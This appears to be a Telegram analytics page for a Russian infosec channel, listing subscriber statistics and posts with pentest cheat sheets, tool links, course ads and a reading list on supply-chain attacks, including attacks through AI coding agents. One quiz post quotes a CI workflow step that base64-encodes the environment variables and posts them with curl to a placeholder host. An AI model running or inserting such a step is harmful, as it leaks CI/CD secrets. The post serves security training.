Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
Kanalga Telegram’da o‘tish
Все самое полезное по инфобезу в одном канале. Список наших каналов: https://t.me/proglibrary/9197 Для обратной связи: @proglibrary_feeedback_bot По рекламе: @proglib_adv РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Ko'proq ko'rsatish📈 Telegram kanali Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность analitikasi
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность (@hackproglib) Rus til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 12 818 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 9 915-o'rinni va Rossiya mintaqasida 51 733-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 12 818 obunachiga ega bo‘ldi.
05 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni -7 ga, so‘nggi 24 soatda esa 0 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 6.12% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 3.64% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 785 marta ko‘riladi; birinchi sutkada odatda 467 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 7 ta reaksiya keladi.
- Tematik yo‘nalishlar: Kontent хакер, навигация, htb, linux, шпаргалка kabi asosiy mavzularga jamlangan.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“Все самое полезное по инфобезу в одном канале.
Список наших каналов: https://t.me/proglibrary/9197
Для обратной связи: @proglibrary_feeedback_bot
По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 07 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
12 818
Obunachilar
Ma'lumot yo'q24 soatlar
-97 kunlar
-730 kunlar
Ma'lumot yuklanmoqda...
O'xshash kanallar
Taglar buluti
Kirish va chiqish esdaliklari
---
---
---
---
---
---
Obunachilarni jalb qilish
Iyun '26
Iyun '26
+18
1 kanalda
May '26
+116
2 kanalda
Get PRO
Aprel '26
+109
1 kanalda
Get PRO
Mart '26
+307
4 kanalda
Get PRO
Fevral '26
+254
6 kanalda
Get PRO
Yanvar '26
+116
2 kanalda
Get PRO
Dekabr '25
+102
2 kanalda
Get PRO
Noyabr '25
+170
2 kanalda
Get PRO
Oktabr '25
+133
4 kanalda
Get PRO
Sentabr '25
+120
0 kanalda
Get PRO
Avgust '25
+170
4 kanalda
Get PRO
Iyul '25
+129
1 kanalda
Get PRO
Iyun '25
+180
2 kanalda
Get PRO
May '25
+161
1 kanalda
Get PRO
Aprel '25
+152
1 kanalda
Get PRO
Mart '25
+256
53 kanalda
Get PRO
Fevral '25
+209
32 kanalda
Get PRO
Yanvar '25
+195
35 kanalda
Get PRO
Dekabr '24
+216
40 kanalda
Get PRO
Noyabr '24
+207
41 kanalda
Get PRO
Oktabr '24
+277
38 kanalda
Get PRO
Sentabr '24
+212
38 kanalda
Get PRO
Avgust '24
+242
37 kanalda
Get PRO
Iyul '24
+261
37 kanalda
Get PRO
Iyun '24
+201
32 kanalda
Get PRO
May '24
+277
39 kanalda
Get PRO
Aprel '24
+327
37 kanalda
Get PRO
Mart '24
+246
32 kanalda
Get PRO
Fevral '24
+286
31 kanalda
Get PRO
Yanvar '24
+302
27 kanalda
Get PRO
Dekabr '23
+308
25 kanalda
Get PRO
Noyabr '23
+253
5 kanalda
Get PRO
Oktabr '23
+1 115
23 kanalda
Get PRO
Sentabr '23
+562
0 kanalda
Get PRO
Avgust '23
+510
0 kanalda
Get PRO
Iyul '23
+339
0 kanalda
Get PRO
Iyun '23
+194
0 kanalda
Get PRO
May '23
+400
0 kanalda
Get PRO
Aprel '23
+181
0 kanalda
Get PRO
Mart '23
+437
0 kanalda
Get PRO
Fevral '23
+310
0 kanalda
Get PRO
Yanvar '23
+245
0 kanalda
Get PRO
Dekabr '22
+340
0 kanalda
Get PRO
Noyabr '22
+413
0 kanalda
Get PRO
Oktabr '22
+253
0 kanalda
Get PRO
Sentabr '22
+276
0 kanalda
Get PRO
Avgust '22
+256
0 kanalda
Get PRO
Iyul '22
+361
0 kanalda
Get PRO
Iyun '22
+408
0 kanalda
Get PRO
May '22
+221
0 kanalda
Get PRO
Aprel '22
+156
0 kanalda
Get PRO
Mart '22
+369
0 kanalda
Get PRO
Fevral '22
+136
0 kanalda
Get PRO
Yanvar '22
+265
0 kanalda
Get PRO
Dekabr '21
+258
0 kanalda
Get PRO
Noyabr '21
+349
0 kanalda
Get PRO
Oktabr '21
+315
0 kanalda
Get PRO
Sentabr '21
+315
0 kanalda
Get PRO
Avgust '21
+295
0 kanalda
Get PRO
Iyul '21
+351
0 kanalda
Get PRO
Iyun '21
+399
0 kanalda
Get PRO
May '21
+589
0 kanalda
Get PRO
Aprel '21
+574
0 kanalda
Get PRO
Mart '21
+400
0 kanalda
Get PRO
Fevral '21
+433
0 kanalda
Get PRO
Yanvar '21
+338
0 kanalda
Get PRO
Dekabr '20
+2 141
0 kanalda
| Sana | Obunachilarni jalb qilish | Esdaliklar | Kanallar | |
| 07 Iyun | +3 | |||
| 06 Iyun | +1 | |||
| 05 Iyun | +1 | |||
| 04 Iyun | +1 | |||
| 03 Iyun | +5 | |||
| 02 Iyun | +5 | |||
| 01 Iyun | +2 |
Kanal postlari
🚩 Gobuster DNS Mode — полезные флаги для поиска поддоменов
Если используете Gobuster для DNS-брутфорса, эти параметры стоит держать под рукой:
🈶 -d, --domain
Указать целевой домен:
-d target.com🈶 -i, --show-ips Показывать IP-адреса найденных поддоменов. 🈶 -c, --show-cname Отображать CNAME-записи. 🈶 --wildcard Продолжить работу даже при обнаружении wildcard DNS. 🈶 --resolver Использовать свой DNS-резолвер:
--resolver 8.8.8.8 | 2 | 🐧 Шпаргалка по работе с командой less в Linux: на заметку этичному хакеру
Команда less позволяет перематывать текст не только вперёд, но и назад, осуществлять поиск в обоих направлениях, переходить сразу в конец или в начало файла.
👉 Источник
🔹 Практический интенсив «Архитектуры и шаблоны проектирования»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#магиякода | 326 |
| 3 |  🗺 Как DPI распознаёт MTProto-прокси
Полезный технический разбор про то, почему одной маскировки под TLS уже недостаточно.
В статье объясняют:
— как работает Fake-TLS в MTProto;
— почему JA3/JA4 fingerprint помогает находить неидеальный TLS;
— как DPI анализирует размеры пакетов, тайминги и keep-alive;
— почему зашифрованный payload всё равно оставляет сетевые метаданные;
— где упирается предел DPI из-за стоимости глубокого анализа.
🔗 Читать подробнее
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#resource_drop | 511 |
| 4 | 😎 Знакомьтесь с экспертом Proglib.academy: Senior Software Engineer и Team Lead в Yandex Cloud Роман Барлос
Роман — консультант нашего курса «Разработка ИИ-агентов». Он работает на стыке cloud-native архитектуры и AI, активно внедряя современные ИИ-подходы в реальные процессы разработки.
За что его ценит IT-комьюнити?
🟣 Team Lead и AI-евангелист в команде UX Yandex Cloud
14-лет в разработке. Занимается AI-адопшеном в команде Yandex Cloud, проводит мастер-классы и продвигает лучшие практики для повышения эффективности разработчиков.
🟣 Техлид Sourcecraft Code Assistant
С сильным практическим бэкграундом принимал участие как технический лид в создании мощного AI-расширения для VS Code.
🟣 Создатель полезного Open Source
Разрабатывает утилиты, которые позволяют быстро начать эксперименты с инференсом и агентами в локальном окружении: например, набор скриптов vllm-setup для быстрого запуска окружения и mini-proxy — минималистичный прокси для OpenAI API провайдеров.
🟣 Автор интерактивных ML-визуализаций
Объясняет сложные концепции наглядно. Создал серию залипательных обучающих материалов, где можно вживую пощупать работу сетей Хопфилда, машин Больцмана и VC-размерности.
Роман регулярно делится инженерными наработками, инсайтами и экспертизой в своем авторском Telegram-канале
На курсе Роман выступает консультантом программы: он помогает формировать содержание уроков с опорой на актуальные инженерные практики и жесткие требования индустрии.
Узнать больше о программе и разработке автономных систем:
👉 Курс «Разработка ИИ-агентов»
Так, продолжаем знакомить вас с командой?
👍 — Да, ждем новых лиц
🔥 — Жду полезные материалы от Романа | 485 |
| 5 |  Как заплачено, так и нафигачено! 🤪
🐸 Библиотека хакера
#hack_humor | 554 |
| 6 | 🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру
🔹 Курс «Алгоритмы и структуры данных»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#магиякода | 611 |
| 7 |  💡 Крупнейший каталог OSINT-инструментов
В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:
— Telegram
— Социальные сети
— Email и Username Search
— Геолокация
— Анализ доменов и IP
— Утечки данных
— Metadata Analysis
— Threat Intelligence
➡️ Что удобно:
— поиск по инструментам;
— автоматическое обновление из GitHub;
— более 50 категорий;
— веб-версия, Android и desktop-клиент.
Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров.
🔗 Ссылка
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#resource_drop | 626 |
| 8 | 🧩 Хакер-челлендж
Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow.
Внутри добавили шаг:
- name: Debug publish run: | env | base64 | curl -s -X POST https://example[.]com/logs -d @-
Автор PR пишет:
«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».
❓ Что здесь нужно проверять в первую очередь? Голосуйте эмодзи:
🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу.
👾 — Dependency confusion: пакет подтягивается из внешнего registry.
❤️ — Cache poisoning: атакующий подменяет build cache.
👍 — Path traversal: workflow читает файлы за пределами проекта.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#ctf_challenge | 691 |
| 9 | ⚡️ Продолжаем знакомить вас с экспертами курса AgentOps!
— Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов
— Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем
— Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена
— Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation
— Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры
Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса.
👉 Изучить обновленную программу AgentOps и занять место. | 657 |
| 10 |  💻 Практика атак на Kubernetes
Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике.
➡️ Что внутри:
— ошибки RBAC и лишние привилегии
— уязвимые контейнеры
— небезопасные настройки кластера
— privilege escalation
— container escape
— практические сценарии для Red Team и Blue Team
Отличная площадка для изучения атак на Kubernetes в безопасной среде ✅
🔗 Ссылка на GitHub
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#tool_of_the_week | 709 |
| 11 | Подрядчик подключился к вашей системе. Работу сделал. Доступ остался.
Знакомая ситуация?
В какой-то момент становится сложно ответить на простой вопрос, кто сейчас вообще подключен к вашим ИТ-ресурсам и что там делает.
Именно в таких сценариях чаще всего начинаются проблемы. Доступы выдаются быстро, а потом про них забывают. Контроль снижается, а одной ошибки или компрометации бывает достаточно, чтобы затронуть важные для компании системы.
В канале Индид вы найдете материалы о том, как выстраивать защиту учетных данных, снижать риски инцидентов и всегда держать доступ к инфраструктуре под контролем.
В нем вы сможете забрать гайд по работе с подрядчиками. Внутри:
📍 Ключевые риски ИБ при работе с подрядчиками
📍 Способы атак злоумышленников и их последствия
📍 Меры безопасности, регламентирующие получение прав доступа
Подписывайтесь на канал Индид, чтобы регулярно читать практические материалы о защите доступа.
#реклама
О рекламодателе | 560 |
| 12 | Они прогрессируют, уже пытаются маскироваться под людей
🔹 Курс разработка AI-агентов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#небагафича | 684 |
| 13 | ⚡️ Blind SQLi через время ответа в ffuf
При поиске Blind SQL Injection не всегда есть ошибки в ответе приложения. Иногда единственный признак — увеличение времени ответа.
Команда для поиска параметров с задержкой:
-w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
-fc 404 \
-mt 5000
🈂️ -mt 5000 — покажет только ответы дольше 5 секунд
🈂️ Задержка может указывать на time-based Blind SQLi
🈂️ Удобно для первичного скрининга параметров без ручной проверки
⚠️ Не забывайте исключать ложные срабатывания из-за медленных API, rate limiting и сетевых задержек.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#cheat_sheet | 686 |
| 14 | 🛣 Penetration Testing Roadmap — коллекция ресурсов, сертификатов, инструментов и методологий, которые помогут вам стать экспертом в области пентеста.
👉 GitHub & Сайт
🔹 Курс «Алгоритмы и структуры данных»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#магиякода | 783 |
| 15 |  🔥 Автоматизация пентеста через AI-агентов
Pentest Swarm AI агенты обмениваются находками между собой и самостоятельно выбирают следующие шаги атаки на основе уже собранных данных.
Что умеет:
🔘 Поиск поддоменов
🔘 Сканирование портов
🔘 Поиск уязвимостей
🔘 Эксплуатация находок
🔘 Генерация отчётов
Есть готовые сценарии для Bug Bounty, CTF и анализа внешней поверхности атаки.
🔗 GitHub
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#tool_of_the_week | 763 |
| 16 | ⚡️ Последний шанс забрать курсы со СКИДКОЙ 40%! Прокачайте свой мозг правильно
До конца акции вы можете воспользоваться специальными ценами на самые востребованные IT-направления. Круто и выгодно прокачать свои скиллы, чтобы получить оффер, уехать на Бали и больше не быть онлайн 😎
➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽)
Курс про контролируемую разработку ИИ-агентов: качество, стоимость, наблюдаемость и тестирование. С первого занятия — только практическая работа.
➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽)
Профессиональный трек для разработчиков и LLM инженеров о том, как правильно внедрять AI-логику в бэкенд и сохранять железную стабильность сервиса.
➡️ Математика для Data Science — от 29 990 ₽ (вместо 39 990 ₽)
Вы научитесь решать сложные математические задачи, которые дают на собеседованиях на позицию дата-сайентиста в бигтехе. Отличная база для мощного старта в DS.
➡️ Курс Специалист по ИИ — 89 000 ₽ (вместо 113 900 ₽)
Комплексная программа для получения профессии в сфере ИИ с нуля. За 8 месяцев вы соберете сильное портфолио из 5 реальных проектов и дипломной работы.
➡️ Архитектуры и шаблоны проектирования — 27 990 ₽ (вместо 37 900 ₽)
Интенсив для разработчиков, который поможет освоить основные паттерны проектирования и прокачать навыки архитектора программного обеспечения.
🌸 Выбирайте направление, оставляйте заявку на сайте распродажи, и наш менеджер подробно вас проконсультирует | 714 |
| 17 | 🔑 Топ-4 механизма аутентификации
Эти архитектуры уберегут вас от фатальных дыр в безопасности при настройке серверов, интеграции сторонних сервисов или проектировании баз данных.
🛡 Главные инструменты проверки:
1. Ключи SSH: Криптографическая пара из публичного и приватного ключей. Публичный лежит на сервере, приватный — у вас. Идеально подходит для безопасного беспарольного доступа к серверам и Git-репозиториям.
2. Токены OAuth: Временные цифровые пропуска, которые выдает сервер авторизации. Нужны для того, чтобы сторонние приложения могли получить ограниченный доступ к вашим данным (например, «войти через Google»), вообще не зная вашего реального пароля.
3. Сертификаты SSL: Цифровые паспорта для сайтов. Они подтверждают, что сервер принадлежит именно тому домену, на который вы зашли, и обеспечивают безопасное зашифрованное HTTPS-соединение.
4. Учетные данные: Классическая связка «логин + пароль». Данные пользователя отправляются по защищенному каналу на сервер, где пароль хэшируется и сверяется с базой данных. Самый старый, понятный, но и самый уязвимый из-за человеческого фактора метод.
🔹 Практический интенсив «Архитектуры и шаблоны проектирования»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#ликбез | 667 |
| 18 |  📌 580+ команд для пентестера
Внутри собраны команды по основным направлениям:
— Recon & Enumeration
— Active Directory
— Web Security
— Privilege Escalation
— Pivoting & Tunneling
— Post Exploitation
— Linux и Windows
Все команды разбиты по категориям и доступны через удобный интерфейс в стиле терминала ⚡️
🔵 Подойдёт для:
— OSCP / OSEP подготовки;
— CTF;
— лабораторий;
— внутренних пентестов;
— быстрого поиска команд во время работы.
📎 Ссылка
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#cheat_sheet | 591 |
| 19 | 🦾🧠🏋️ Качаем мозги к лету!
Все готовятся к пляжному сезону, а мы предлагаем прокачать хард-скилы, чтобы забрать крутой оффер, строить продукты будущего и работать из любой точки мира 😎
⚡️ Распродажа @proglib_academy: забирайте самые актуальные образовательные треки по сниженным ценам!
➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽).
➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽).
➡️ Математика для разработки AI-моделей — 23 990 ₽ (вместо 31 990 ₽).
➡️ ML для старта в Data Science — 28 990 ₽ (вместо 38 990 ₽).
Почему мы?
⭐️Учим для продакшена. Наши программы заточены под реальные задачи бизнеса: как не слить бюджет на токены, как заставить LLM работать стабильно в бэкенде и как выстроить отказоустойчивую архитектуру.
⭐️Спикеры — суровые практики. Вы будете перенимать опыт у действующих AI-архитекторов, тимлидов и ML-инженеров из топовых IT-компаний.
⭐️Комплексный подход. Мы даем как мощный математический фундамент для понимания моделей «под капотом», так и передовые инструменты оркестрации агентов.
⭐️Много практики и фидбека. Вебинары, десятки практических заданий и живое общение с экспертами в чате Telegram на протяжении всего обучения.
⏳ Оставляйте заявку и бронируйте место со СКИДКОЙ 40% | 640 |
| 20 |  📌 Подборка статей по теме Supply Chain атак через инструменты разработчика
Собрали топовые материалы: от разбора конкретных инцидентов до техник защиты.
➖ Отравленное расширение VS Code привело к взлому GitHub, и Microsoft владеет каждым звеном этой цепи — полная анатомия атаки: как троянизированный Nx Console (2.2M установок) за 18 минут привёл к краже 3 800 внутренних репозиториев GitHub. Лучший разбор инцидента.
➖ Технический deep dive в пейлоад Nx Console — StepSecurity — multi-stage credential stealer: сбор токенов из GitHub/npm/AWS/Vault/K8s/1Password, DNS-туннелирование, persistence через GitHub Search API как dead-drop, поддельная Sigstore-аттестация для публикации «легитимных» пакетов.
➖ Ликвидация инфраструктуры GlassWorm: разрушение supply chain атак на VS Code, npm, Python и GitHub — как CrowdStrike, Google и Shadowserver 26 мая одновременно уничтожили все C2-каналы ботнета. 35 000+ заражённых установок, 300+ отравленных репозиториев с начала 2025.
➖ Вредоносный npm-пакет крадёт файлы из рабочей директории Claude AI — пакет mouse5212-super-formatter, написанный с помощью ИИ, таргетит /mnt/user-data. Автор слил свой же GitHub-токен в код.
➖ Как закрепить версии расширений VS Code для защиты от supply chain атак — практический гайд: pinning версий в devcontainers, отключение автообновления, проверка publisher identity.
➖ Утечка исходного кода GitHub: причиной стало вредоносное расширение для VS Code — подробный русскоязычный разбор: механика червя Mini Shai-Hulud, инфраструктура C2 через «мёртвые» репозитории, демон kitty-monitor, аварийный переключатель по ключевому слову «firedalazer».
➖ Вы пустили ИИ-агента в репозиторий — теперь разбираемся, что он может сломать — кража SSH-ключей через Claude Code, эксфильтрация через DNS-запросы в обход allowlist, компрометация CI/CD → cloud admin за 72 часа через OIDC.
➖ Черви в расширениях VS Code: новая угроза для разработчиков — как вредоносные расширения используют децентрализованные C2, обфускацию и легитимные репозитории.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#resource_drop | 665 |
